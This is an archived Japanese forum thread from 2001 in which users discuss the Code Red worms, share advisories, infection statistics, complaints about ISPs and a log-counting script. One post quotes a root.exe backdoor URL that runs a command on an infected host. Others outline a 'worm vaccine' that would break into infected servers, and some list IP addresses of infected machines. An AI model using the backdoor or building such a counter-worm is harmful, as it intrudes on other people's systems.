5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  
■ このスレッドは過去ログ倉庫に格納されています

コードレッド (Code Red) 逝ってヨシ

1 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:16
猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
についての情報を追いましょう。

前スレはこちら
「コード・レッド」って怖いの?
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

IPA による CodeRed II 注意喚起 (日本語)
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

JPCERT/CC による Code Red II 注意喚起 (日本語)
http://www.jpcert.or.jp/at/2001/at010019.txt

CERT Advisory 2001-23 和訳
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html

その他の情報源は >>2

2 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:16

Code Red II 情報(英語) : 解析情報へのリンクあり
http://www.incidents.org/react/code_redII.php

Code Red II の警告と解析レポート (英語PDF)
http://aris.securityfocus.com/alerts/codered2/

CodeRed Scanner (英語) : CodeRed 感染の可能性があるホストをスキャン
http://www.eeye.com/html/Research/Tools/codered.html

ヤマハ RT80i, RT50i の脆弱性
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html

古川電工 MUCHO-E シリーズが受ける影響
http://www.humind.or.jp/~higasino/ML/infusers/2001-Aug/msg00003.html

崩壊させられているプロバイダ INTERLINK の障害情報
http://www.interlink.or.jp/notification/backno/2001/trb029.html

東アジア壊滅の図
http://www.security.nl/misc/codered-stats/

Code Red騒ぎでCode Redソーダが絶好調 (日本語)
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

3 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:17
ナイス1

4 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:21
iku

5 :1:2001/08/07(火) 11:26
逝っちゃってるプロバイダ情報
http://watch.impress.co.jp/broadband/news/2001/08/06/codered.htm

6 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:26
http://www.security.nl/misc/codered-stats/geodist.html

でかい赤丸にカーソルを合わせると、北緯37.53度・東経127度
あの国です。

7 :DQNルータ?:2001/08/07(火) 11:29
1に出てるDQNルータって、管理Webが外に丸見えなんすかね?
それともやっぱ、内側のサーバが感染しちまってるのか・・・
→ならばリセットして感染発見され、到って結果オーライ!!!

8 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:31
>>6
相変わらず、東京、大阪の報告が1件とか2件ですねえ。なんでJARO。

9 :お疲れさん>>1:2001/08/07(火) 11:51
沈静化してきたのかな?
http://www.security.nl/misc/codered-stats/detailed.html

10 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:55
>>9
cnで48時間、他で24時間周期で活動・休眠するらしいので、それのせいかも。
→securityfocus記事。まだ、ぽろぽろやってくるけど。
昨日も夕方がひどかったけど、今日はどうかな。
#ひとまず収まっても、本質的対策がなければ、いくらでも亜種が出そう。

11 :お腹イパーイ:2001/08/07(火) 11:56
いや、Nの方がお休み期間になったので、減ったように見えるという
ウワサも?うちのサバにはXくんが、相変わらず来てるよ。Nも少し来てるけど。

12 :お腹いっぱい:2001/08/07(火) 11:57
Code Red問題って2000年問題以上の
問題と思うけど、どうよ?

2000年問題として2000年対策
Code Red問題としてIIS使用禁止対策
どう?

13 :虫ですから:2001/08/07(火) 12:00
>>8
>東京、大阪の報告が1件とか2件ですねえ

そりは、未だに気が付かない管理者が多いだけな気がする是。
ニュースグループなんかでも、今どき聞いてくるヤツがいるもんな。

14 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:01
MSはサーバ関連製品の製造販売禁止ってことでいいかな。

15 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:04
>>10
Code Red II は最初の24時間(cnで48時間)の感染活動を終えると、
リブートするのでは?
そして、バックドアとトロイだけが残ると・・・
http://www.ae.wakwak.com/~sysportcore/sysport/kb/security/coderedworm.htm

16 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:04
通信機器とかサーバ接続がお国の認定制になるのも、嫌といえよう。

17 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:06
>>15
こんどはバックドア探しツアーなロボットだの厨房が大量に増えるわけね。
昨日の午後は、UDP probeがペアでお越しになったけど。

18 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:07
>>13
オランダまでとどいてないってだけでしょう。
K国っておくてっとオランダと近いのか?

19 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:11
>>17
その可能性は大だと思うよ。
「場は提供した。あとは好きにやれや。」みたいな感じかなー。

20 :転載:2001/08/07(火) 12:11
154 名前:みや 投稿日:2001/08/07(火) 09:14 ID:wAqzeuUY
http://www.isc.org/ds/WWW-200101/dist-bynum.html
を見るとkrのHOST数は397809 認知感染数は、5236 感染率 1.3%

全世界のHOST数は、約1億 なぜかカンコクは 4%しかないのに 感染数ダントツの一位

21 :( ´Д`):2001/08/07(火) 12:15
うちの鯖A 12時間で168回
鯖B12時間で180回


全くうぜー

22 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:20
あああbiglobeのフレッツ馬鹿がうざい
頃しちゃっていいですか?

23 :あぼーん:2001/08/07(火) 12:33
>>1
ナイスです、スレ盾おつかれさま。

24 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:39
確かにアドレスが近いところからやって来るんですが、
昨日と違ってNS lookupしてもホスト名不明な所がめちゃくちゃ増えてます。
(昨日は同じISPか韓国がほとんどでした)

これって大丈夫・・・というか、どういう事なんでしょうか・・?
今まで通り無視でいいのかな。(;´Д`)

25 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:43
だからどうした、と言われても困るんだが。もっとあるかと思ったんだけど、思ったより少ないな。
http://www2.to/codered/
http://member.nifty.ne.jp/i-tech/codered/maruigas.htm
http://www02.so-net.ne.jp/~kyoko-t/arcana/pklistv0.htm
http://www3.airnet.ne.jp/codered/

26 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:42
ウチにもケーブルテレビの馬鹿がよくくるよ
純粋なISPでさえ話が通じないっていうのに、CATVにメールだしてわかってもらえるんだろーか(苦笑)

27 :名無しさん@お腹いっぱい。:2001/08/07(火) 12:58
>>24
WindowsでBlackICE使ってますけど、DNS載ってなくてNetBIOS名ついてるのが
結構多い。足すと、IPしか判らない奴、今日も特にふえてないすよ。

単に、DNS登録しないプロバからのが増えただけで、特別なテク使う奴が
現れたわけではないんでは(うちは旧INFOWEBなんで、そっちと状況違うかも)

28 :名無しさん@お腹いっぱい。:2001/08/07(火) 13:05
http://203.140.143.83/

29 :24:2001/08/07(火) 13:10
>>27
うー、そうなんですか。私は旧niftyなんですが、今日はさっぱりで・・。
(ZoneAlarm+ZoneLogAnalyser)
nifty側が対策したのかな(昨日は全国から来てたんですが)

(サーバ立ててるわけじゃ無いし気にしないでいいか…)

30 :名無しさん@お腹いっぱい。:2001/08/07(火) 13:16
あまりにもヒマなので、要らんPCにW2KとIIS入れて、
code red v3感染後に切り離して飼ってみようと思います。

どこかに夏休みの自由研究スレ作って観察日記でもつけようかな

31 :名無しさん@お腹いっぱい。:2001/08/07(火) 13:17
>>30
くれぐれも切り離してね

32 :名無しさん@お腹いっぱい。:2001/08/07(火) 14:07
>>30
tanosisou

33 :( ´Д`):2001/08/07(火) 14:08
あーCodeRedうざいうざい・・・

34 :名無しさん@お腹いっぱい。:2001/08/07(火) 14:10
感染するとたのしいよ

35 :名無しさん@お腹いっぱい。:2001/08/07(火) 14:37
一向に復活の気配がない INTERLINK

% ping 203.141.139.100
PING 203.141.139.100 (203.141.139.100): 56 data bytes
64 bytes from 203.141.139.100: icmp_seq=0 ttl=20 time=4092.941 ms
64 bytes from 203.141.139.100: icmp_seq=2 ttl=20 time=3212.171 ms
64 bytes from 203.141.139.100: icmp_seq=8 ttl=20 time=1979.282 ms
64 bytes from 203.141.139.100: icmp_seq=9 ttl=20 time=1919.550 ms

逝っちゃってます。技術力ぜんぜん無いんだろうな。

36 :名無しさん@お腹いっぱい。:2001/08/07(火) 14:37
61.115.109.21
211.19.93.143

毎日毎日ウザいんだよ。

37 :名無しさん@お腹いっぱい。:2001/08/07(火) 14:57
>>35
Interlink、今朝、ちょっとだけ戻ったかな?って思えたんだけど
いまはメール送受信すら困難。
安価でIP固定なとこは、被害多いのかも。

38 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:12
CodeRed観察ツール
http://www.rental-web.com/~big-z/info/

39 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:23
http://japan.internet.com/webtech/20010807/12.html
ガイシュツダッタラスマソ

40 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:25
>>39
つうか、このリンク先そのものが亀だな (藁
新情報がないほうが、かえって安心か?(悪化もしてなさそうだということで)

41 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:31
一般紙もようやく
http://www.yomiuri.co.jp/00/20010807i505.htm

42 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:36
>>41
日本には広まっていないようですね。

いま、我々が見ているのは幻影に違いないのか、実はここは日本では
ないのか、ていうか、新聞社のサーバ管理部門はログ見てないのか・・・

43 :名無しさん@お腹いっぱい。 :2001/08/07(火) 15:38
>>41
まるで、他人事みたいな書き方だな。国内に警告を発する気はないのか?
まるでだめた。

44 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:39
>>42
同じプロバイダでIPが近所のヤツ結構やってきてるよ。

45 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:42
>>41
あいかわらず、

> このソフトを使っているサーバーは、予防策としてウイルスの侵入口をふさぐソフトを
>ダウンロードする必要があるという。

と書いているだけで、情報源にぜんぜんなっていないところが...
日本のマスコミってなんでこんなにいつまでたってもドキュソなの?

46 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:43
>>44
当然知ってての嫌味だってば(藁

47 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:44
>>45
JPCERTにしてから、6日(月)に発表だもんね。「緊急対策」センターといっても
こんなもんか?
http://www.mainichi.co.jp/digital/network/today/1.html

48 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:47
>>38
早速2発、、、

49 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:57
>>41
〜〜という。

こんな文ばっかり。

50 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:57
>>41
朝日は報道すらしない。もう新聞屋ヤメロお前ら。

51 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:58
>>43
ホントだよなぁ。海外の状況よりも、国内の情報収集を
積極的にやろうぜ!ってな姿勢がほっすぃーよ。
で、海外と国内の感染状況の比較なんぞがあれば完璧だ!

52 :名無しさん@お腹いっぱい。:2001/08/07(火) 15:59
>>38
こういうツールはソース公開してくれんと使う気がおきんよなぁ。

53 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:04
>>52

同意
Code Red に負けず劣らず怪しいな

54 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:05
>>52
でもなかなか便利で面白いよコレ(w

55 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:05
CNN の記事
http://www.cnn.co.jp/2001/TECH/08/06/code.red.two/index.html

MS と Symantec へのリンクあるだけ読売よりマシか、
と思ったら

> なお、コード・レッドやコード・レッドIIは
> サーバーにのみ感染し、家庭からインターネットに
> 接続しているパソコンには被害はない。

こういうこと書いてるし・・・
はぁ、とりあえず読売と CNN にメール書くか。
それで改善されるとは思ってないけど。

56 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:08
すくなくともBIG-Z Projectは信用できるだろ

57 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:11
そのメールに「ppp.***.ne.jp」だとか、「dailup.***.ne.jp」だとか
からのアクセスログを添付するよろし。
ダイアルアップマシンもどえりゃー感染しとるんじゃ!ゴルァ!って感じ?(w

58 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:14
>>56
出来ねーよ。
http://www.rental-web.com/~big-z/info/spasetup.html
ここ踏んでみ?いきなり怪しげなレジストリ書き換えファイル送りつけてくるから。

59 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:25
http://www.jpix.co.jp/English/English%20Html/E_traffic2.htm

JPIX

60 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:28
>>59
この赤いのはなんだろ。

61 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:40
日本のサーバーからXくん来たけど、これって教えてやるべき?
「ページを表示できません
 現在、多数の人が Web サイトにアクセスしています。」だって。

62 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:50
>>58
だってそれを承知で試すためのページじゃん(w

63 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:50
あ〜あ、また今日も来るのか・・・。

繋げて10分で30回(10件x3)近く来てるよ。

何年か放置されてるような鯖もあるから、
そんなとこは対策もするわけないかな〜。

64 :名無しさん@お腹いっぱい。:2001/08/07(火) 16:55
誰かバックドアから入ってIISの息の根止めるプログラム作ってくれ(;´Д`)
毒をもって毒を制す、しか無い

65 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:00
今日も収束の気配全くないです。
プロバイダ関係者は CR-II との戦い4日目に突入決定かな。

66 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:01
>>64
今、ネットワークに送り出したけど、しばらくしないと効果は出てこないと思う。

67 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:07
>>65
こっちも増加傾向になってきた模様・・・ ヽ(;´Д`)ノ
http://www.security.nl/misc/codered-stats/detailed.html

68 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:08
Code Redに感染した糞M$の鯖だけを狙って潰すような
ワームウィルスならぬワームワクチンを作成しよう(わら

69 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:08
>>61
そのサーバーの管理者が判ればそこへ
わからなければプロバイダ調べてそこへ
メール、電話、FAX で連絡してください。

70 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:11
これはバカの分布図・・・
http://www.security.nl/misc/codered-stats/geodist.gif

71 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:12
MSを糾弾する動きってのはないんだなぁ
誰か死なないと橋石火石車輪のような騒ぎにはならん

72 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:12
>>70
丸が大きい国はIT先進国(w

73 :61:2001/08/07(火) 17:14
>>69 サンキュ。
プロバイダーのようなので、
JPNICに登録されている管理者にメールしました。

だれかテンプレート作らない?>通告メール

74 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:20
>>73
おいらの広告アドレスいれてくれたらOKよ

75 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:22
もうCodeRedにも飽きたよ。やめていいよ。

76 :どうだい:2001/08/07(火) 17:29
ワームワクチン機能仕様書

1.外からのport80へ接続をモニタし、件のbuffer overflow攻撃を受けた場合は、反対にbuffer overflow攻撃を行いIIS鯖に侵入を試みる(ここで、侵入しているcode redを殺せる機能が必要)
2.侵入先のIIS鯖では、侵入およびcode redの殺害に成功した場合は、侵入元の鯖に成功した旨の合図を返す
3.(2)の合図を10回程度(定数)受け取ったら、セキュリティホールを埋めるパッチをM$のサイトからダウソしてシステムに当てて、自動的に再起動する。

77 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:31
つーかIISへの攻撃のはずなのにApacheとか使ってるほうが迷惑してここまで着なきゃいけないのはなぜだ!!

78 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:31
>>3
パッチのダウソサイトへのDDoSになりそうな気配が。。。

79 :78:2001/08/07(火) 17:32
>>3 --> >>76

80 :こんな感じでメールした:2001/08/07(火) 17:35
初めまして、○○と申します。

御社で管理されているサーバーから弊社のサーバーへのアクセスとして
下記のログが確認されました。

210.*.*.* - - [07/Aug/2001:16:22:44 +0900] "GET /default.ida?XXXXX(中略)a HTTP/1.0" 404 282

おそらくCodeREDに感染していると思われますので、
お知らせいたしますとともに対応をお願いいたします。
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
http://www.jpcert.or.jp/at/2001/at010019.txt
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html

突然のメールで失礼いたしました。
よろしくお願いいたします。

===================================[バカ発見]====================================
ttp://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588&st=74&to=74&nofirst=true
===================================[バカ発見]====================================

81 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:40
★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★
スペシャル情報

◎ネットで得するいろんな情報を紹介したリンク集。
無料プロバイダ・HP・メアド・レンタル掲示板・チャット
などの無料、懸賞サイトのお得な情報満載!
HP宣伝掲示板もあります♪

      ★ポツくんのお得情報!★
     http://ww8.tiki.ne.jp/~potukun/

★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★

初めまして、○○と申します。

御社で管理されているサーバーから弊社のサーバーへのアクセスとして
下記のログが確認されました。

210.*.*.* - - [07/Aug/2001:16:22:44 +0900] "GET /default.ida?XXXXX(中略)a HTTP/1.0" 404 282

おそらくCodeREDに感染していると思われますので、
お知らせいたしますとともに対応をお願いいたします。
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
http://www.jpcert.or.jp/at/2001/at010019.txt
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html

突然のメールで失礼いたしました。
よろしくお願いいたします。





★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★
スペシャル情報

◎ネットで得するいろんな情報を紹介したリンク集。
無料プロバイダ・HP・メアド・レンタル掲示板・チャット
などの無料、懸賞サイトのお得な情報満載!
HP宣伝掲示板もあります♪

      ★ポツくんのお得情報!★
     http://ww8.tiki.ne.jp/~potukun/
★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★━★

82 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:41
ワームワクチン機能仕様書(Ver.1)

1.外からのport80へ接続をモニタし、件のbuffer overflow攻撃を受けた場合は、反対にbuffer overflow攻撃を行いIIS鯖に侵入を試みる(ここで、侵入しているcode redを殺せる機能が必要)
2.侵入先のIIS鯖では、侵入およびcode redの殺害に成功した場合は、侵入元の鯖に成功した旨の合図を返す
3.侵入成功の合図を受け取った側では、自分のシステム内にデータとして保持していたセキュリティホールを埋めるパッチプログラムを、侵入成功した先に送信する(保持していない場合は、M$のサイトからダウソする)。この場合、送信側と受信側とでCRCチェックを行うこと。
4.(2)の合図を10回程度(定数)受け取ったら、パッチプログラムを自分のシステムに当てて、自動的に再起動する

83 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:42
>>62
テストページを踏むまで大丈夫であるかのように装っていきなり
送りつけて来るんだぞ?
そんなことする奴がトロイを組み込んでたとしてもなんの不思議もない。
Java切っとけば問題ないみたいだが。

84 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:43
>>55
> なお、コード・レッドやコード・レッドIIは
> サーバーにのみ感染し、家庭からインターネットに
> 接続しているパソコンには被害はない。

この記事、間違いなの?サーバ立ててなかったらCodeRedは関係ないと思ったけど?

85 :さげ:2001/08/07(火) 17:44
Redirect /default.ida http://www.microsoft.com/

Apacheユーザは今すぐにhttpd.confにこれを書き加えるべし!!
M$にリクエストが飛びます。

86 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:44
>>82
Xタイプの場合はroot.exe経由で直接侵入してもいいかも。

87 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:44
>>82
弱点は、1.の侵入が成功しなかったら(code red の亜種で対策を取られた場合を含む)
どうしようもないこったな

88 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:45
>>76
もう前スレから何度も書いてるのでしつこくてすまんが、
実験としてローカルでやるのは面白いけど、インターネットで実際に
やったら不正アクセス防止法違反になるから止めとけよ。

89 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:45
例えば家庭からIIS入れたWindows2000Professionalで繋いでるとあぼーん

90 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:45
>>77
それがwormの醍醐味でしょう。。。

91 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:47
>>88
緊急避難(刑法)つーことで…

92 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:48
>>84
誤解を招くということ。
家庭からつないでいるかどうかは関係ない。
該当する IIS が実行されているかどうかでしょ?

93 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:48
>>91
結果的に事態を悪化させた場合は過剰避難として犯罪になります(わら

94 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:48
>>88
そりは、CodeRedに感染してるにも関わらず、接続斬らないネットワーク
管理者全員を逮捕してから考えることでは?

95 :そんな感じのメールもらいました:2001/08/07(火) 17:49
今朝はありがとう。
ハイパー初心者なのにサーバー持っちゃいました。
思いっきり攻撃受けちゃいました。
みなさんにご迷惑お掛けしてしまい、申し訳ありませんでした。

とりあえず、パッチは当ててもらったのですが、そのあと生成された
ファイルなどは外様にご迷惑を掛けるものじゃないんですよね?
難しいですね。

96 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:51
>>91
国際刑法上はどうなるんだ?ネットに国境はねーし

97 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:52
>>94
不正アクセスを故意におこなっていたかどうかって
話になったら、鯖放置ヴァカのほうが有利に
なっちゃったりして。

98 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:53
>>85
これって自分のサーバーがM$にアタックしてることにならないの?

99 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:55
210.152.236.143
210.152.236.145
210.140.200.166
ここってac.yahoo.co.jpなんですけどIISなんですかね?

それとここは笑える
210.145.140.146
セキュリティ関連の著者のサイトだけど執筆活動の前にパッチを早く当ててほしい。

100 :名無しさん@お腹いっぱい。:2001/08/07(火) 17:56
aplixから来たが、大丈夫か?(藁

101 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:00
iij4uのフレッツADSLからも、、、

102 :そんな感じのメールもらいました:2001/08/07(火) 18:01
>>95>>80宛です。
速いな〜スレ伸びるの。

103 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:01
セキュリティホールとかバックドア突いてセキュリティ
パッチ当てることが合法か違法かって、判例はないし
逮捕者はいないよね? あったら教えてくれ。
前例になってみたいの? > 94

104 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:03
#! /bin/sh
TMPLOG=`date +%Y%m%d%H%M%S.log`
date +%Y-%m-%d_%H:%M
grep -h "default.ida" /var/log/httpd/access_log* | sed -e "s/ - - .*$//" | sort
>${TMPLOG}
echo "total: " `cat ${TMPLOG} | wc -l`
echo "hosts: " `uniq ${TMPLOG} | wc -l`
echo "Top20:"
uniq -c ${TMPLOG} | sort -r | head -20
rm -f ${TMPLOG}

105 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:04
欧米のスーパーハカーが、高伝染性でIIS即死のcode blackとかを作って
結果的に事態を沈静化し、賞賛と喝采を受けて名を上げるでしょう。
日本のスーパークラカーには何もできません。

106 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:05
>>105
でも高伝染性だから結局 DDoS になって、作者捕まる、と。

107 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:05
インターリンク週末までダメか?

      インターリンクからのお知らせです。

ご迷惑をおかけしております事をお詫び申し上げます。
速度低下の問題につきましては感染者を抽出し弊社側で一時的に感染者のサービ
スを停止しておりますので除々に速度は改善されます。(現在約50%です)
(感染者のサービス停止のご連絡は事後報告となる場合もございますがご了承く
ださい)完全復旧は今週末を予定しております

108 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:06
つか、code red の亜種として
・画面上に「MS製品とIISは、糞です。このように侵入を許してしまうのが何よりの証拠です。さっさと別のプラットフォームに乗り換えましょう」と固定貼り付け常に手前に表示のウィンドウを鯖の画面に出す
・同じ文面を、LAN内のプリンタに印刷する
の機能を持ったのを作ってほしい

109 :105:2001/08/07(火) 18:07
>>106
おおっと、その前に即死じゃ伝染しないかもね(w

110 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:09
>>108
そういう鯖の管理者は「大変だ!れっどはっとにしなきゃ」
とか騒いで、そこら辺にころがってる古い Distro 入れて
いまどき Ramen とか喰らって撃沈に1票

111 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:09
>>108
文面は複数の世界公用語で書こうね(w

112 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:10
>>111
ならエスペラントで(w

113 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:10
>>110
とりあえず応急処置としてcode redを沈静化できる気がするので
ヨシかなと(w

114 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:11
>>105
欧米のハカー、クラカーの方が
日本よりレベルが高いの?

115 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:13
>>99
わざと感染させてんヂャネーノ?(w

116 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:22
あのさ、気になる事あるんだ。Win2000とかWinNTのIIS狙ってくるって言われてるけど
Win98でもIISってあるよね。WINDOWS\CABS\PWSの中に一連のファイルが入ってる。
パーソナルウェブサーバーをインストしてあるとヤバイのかなー?

117 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:25
インターリンクから来たメール

> ZOOTサービス速度障害の件につきましてはトロイの木馬型ウィルス「CodeRed」
> が原因であると断定致しました。
> このウィルスは任意のサーバーに寄生し、ポートスキャンを行うために多量の
> パケットが流し攻撃目標となっているサーバーに速度低下等の重篤な影響を与え
> ます。

ポートスキャンじゃないんだが。
なんか日本語も錯乱してるし(w

118 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:28
>>116
CodeRed (II含む) に関しては PWS には付かないらしい。

119 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:29
Code Red FAQ を読もう
http://www.incidents.org/react/code_red.php

120 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:31
またaplix.co.jpからきやがった。
なんかここのアプリケーションまで信用出来なくなってきた。

121 :とーしろ:2001/08/07(火) 18:31
http://202.250.238.XXX/scripts/root.exe?/c+dir+"c:\"
前スレで見つけたんだけど、これって何?
もしかして、IPの部分を変えれってこと?

122 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:44

http://61-220-187-172.hinet-ip.hinet.net/index.htm

123 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:45
おれのトコは中国系が多いね。
日本だとフレッツISDNのNifty(だと思う。ppp.infoweb.ne.jp)
co.jpも来るけどここには書かない。
メールはしておいたけど。

124 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:48
http://sw59-24-218.adsl.seed.net.tw/

125 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:49

> 123

おれとこも懲り案、茶いニーズ系多いよ。昨日は .go.jp なんてのもあった。

126 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:49
Internetのトラフィックを無用に増やしてしまう、無用サーバーを
立ててる奴らを罰したいと思うのは俺だけか??

127 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:52
s210-219-176-97.thrunet.ne.krうざい、3時間の間に5回来てる

128 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:52
IP: 211.214.202.188
Node: WITNET21-X3IDBP
NetBIOS: IS~TNET21-X3IDBP
Group: WITNET
MAC: 00609709A0A3

このIPから17:28に178回もリクエストがあった。
ほかは、多くても30回が最高。
このIPからのリクエストあった人、他にいます?

129 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:53
>>121
何だか分からないなら触るな。
そいつは迷惑だし犯罪だ。

130 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:54
IP: 210.122.114.92
Node: INTEL
Group: WORKGROUP
NetBIOS: IS~INTEL
MAC: 00D0B7B74803
DNS: INTEL

131 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:56
PWSとIISで別モンだよね?

132 :名無しさん@お腹いっぱい。:2001/08/07(火) 18:59
>>128
http://211.214.202.188/
カンコックのサイトみたいだね。
IIS/5.0だって。

133 :DEFACER 1.0:2001/08/07(火) 19:01
CODE RED VIRUS DEFACER 1.0
http://www.opensource.na-web.net/site/codered.html

134 :123:2001/08/07(火) 19:04
>>125
>昨日は .go.jp なんてのもあった。

ってそりゃマズイでしょ〜。>.go.jp
っつーか、政府がIISなんか使っちゃイカンYO!

どこだろう・・・知りたい(w

135 :84:2001/08/07(火) 19:05
>>92
そっか。とりあえず安心しました。深読みできなくてスマソです。

136 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:11
>>132
ありがと。
いつもは
http://www.mse.co.jp/ip_domain/
ここで、ドメインサーチをしてるんだけど、詳しいデータが出なかった。
それにしても、カンコック系、多いね。
http://www.security.nl/misc/codered-stats/geodist.gif
日本が見えないよー。日本は、こうゆうIT先進国には、ならないようにしないと。

137 :腹ヘッタ:2001/08/07(火) 19:11
http://61.142.137.5/

138 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:16
だからIPさらすのやめろよ。

139 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:23

カンコックのお役所もたいへんみたい
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html

140 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:25
>>139
でも大学が一番酷いと思う

141 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:25
>>126 >>131
PWSもバージョンにもよるけど、基本的にIISの亜種。
でも、IISから付け入って悪さをさせるのはNTのアーキテクチャ。

NT(2000もXPもNT)と、95、98、Meは、見た目は似てるけれど
中身はまるっきり別物。

root権限剥奪もへったくれもない95、98、Meについては心配ご無用。

142 :名無しさん@お腹いっぱい。:2001/08/07(火) 19:25
TCP Flags Sっていうのは平気なんだけど
CMPってのがくると"PROTECTED"とでても
ページが表示できなくなったり、再接続しようとしても
エラーがでて繋げなくなるっ、、、。
これcode redなんすか?
FWはzonealarmいれてます。

143 :腹ヘッタ:2001/08/07(火) 19:27
http://61.77.110.71/index.htm

144 :123:2001/08/07(火) 19:28
って言うか
よくよく見たらNASAから来てるんだけど・・・
pc99013130019.jpl.nasa.gov

これはIPではなくリモホだからOK?

